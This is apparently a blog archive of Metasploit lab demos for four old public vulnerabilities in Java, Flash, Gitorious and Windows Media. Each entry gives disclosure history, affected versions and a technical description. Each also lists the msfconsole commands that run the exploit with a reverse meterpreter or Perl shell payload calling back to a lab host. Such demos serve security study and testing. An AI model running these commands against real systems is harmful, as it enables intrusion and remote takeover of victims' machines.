Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2010-0842 Java MixerSequencer Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability reported to ZDI by Peter Vreugdenhil
Vulnerability reported to the vendor by ZDI the 2009-12-10
Coordinated public release of the vulnerability the 2010-04-05
Details of the vulnerability and first PoC disclosed the 2010-05-21
Metasploit PoC provided the 2012-02-15

PoC provided by :

Peter Vreugdenhil
juan vazquez

Reference(s) :

CVE-2010-0842
OSVDB-63493
ZDI-10-060

Affected version(s) :

Java 6 before or equal to update 18

Tested on Windows 7 Integral with :

Java 6 Update 18
Internet Explorer 9

Description :

This module exploits a flaw within the handling of MixerSequencer objects in Java 6u18 and before. Exploitation id done by supplying a specially crafted MIDI file within an RMF File. When the MixerSequencer objects is used to play the file, the GM_Song structure is populated with a function pointer provided by a SONG block in the RMF. A Midi block that contains a MIDI with a specially crafted controller event is used to trigger the vulnerability. When triggering the vulnerability “ebx” points to a fake event in the MIDI file which stores the shellcode. A “jmp ebx” from msvcr71.dll is used to make the exploit reliable over java updates.

Commands :

use exploit/windows/browser/java_mixer_sequencer
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2011-2140 Adobe Flash Player MP4 Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2011-02-10
Coordinated public release of the vulnerability the 2011-08-23
Vulnerability reported exploited in the wild in November 2011
First PoC provided by Abysssec the 2012-01-31
Metasploit PoC provided the 2012-02-10

PoC provided by :

Alexander Gavrun
Abysssec
sinn3r

Reference(s) :

CVE-2011-2140
OSVDB-74439
ZDI-11-276
APSB11-21

Affected version(s) :

Adobe Flash Player 10.3.181.36 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 10.3.181.34
Longtail SWF Player
Internet Explorer 7

Description :

This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn’t included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.

Commands :

use exploit/windows/browser/adobe_flash_sps
set SRVHOST 192.168.178.100
set SWF_PLAYER_URI http://192.168.178.100/mediaplayer/player.swf
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

OSVDB-78480 Gitorious Arbitrary Command Execution Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability reported to the vendor by joernchen the 2012-01-17
Coordinated public release of the vulnerability the 2012-01-27
Metasploit PoC provided the 2012-01-19

PoC provided by :

joernchen

Reference(s) :

OSVDB-78480

Affected version(s) :

Gitorious before or equal to version 2.1.0

Tested on Ubuntu 11.10 with :

Gitorious 2.1.0

Description :

This module exploits an arbitrary command execution vulnerability in the in gitorious. Unvalidated input is send to the shell allowing command execution.

Commands :

use exploit/multi/http/gitorious_graph
set RHOST 192.168.178.115
set URI /myproject/myproject
SET PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.100
exploit

uname -a
id

MS12-004 Windows Media Remote Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability the 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided the 2012-01-27

PoC provided by :

Shane Garrett
juan vazquez
sinn3r

Reference(s) :

MS12-004
CVE-2012-0003
OSVDB-78210
Trend Micro Blog Post

Affected version(s) :

Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1

Tested on Windows XP SP3 with :

winmm.dll 5.1.2600.5512

Description :

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Commands :

use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid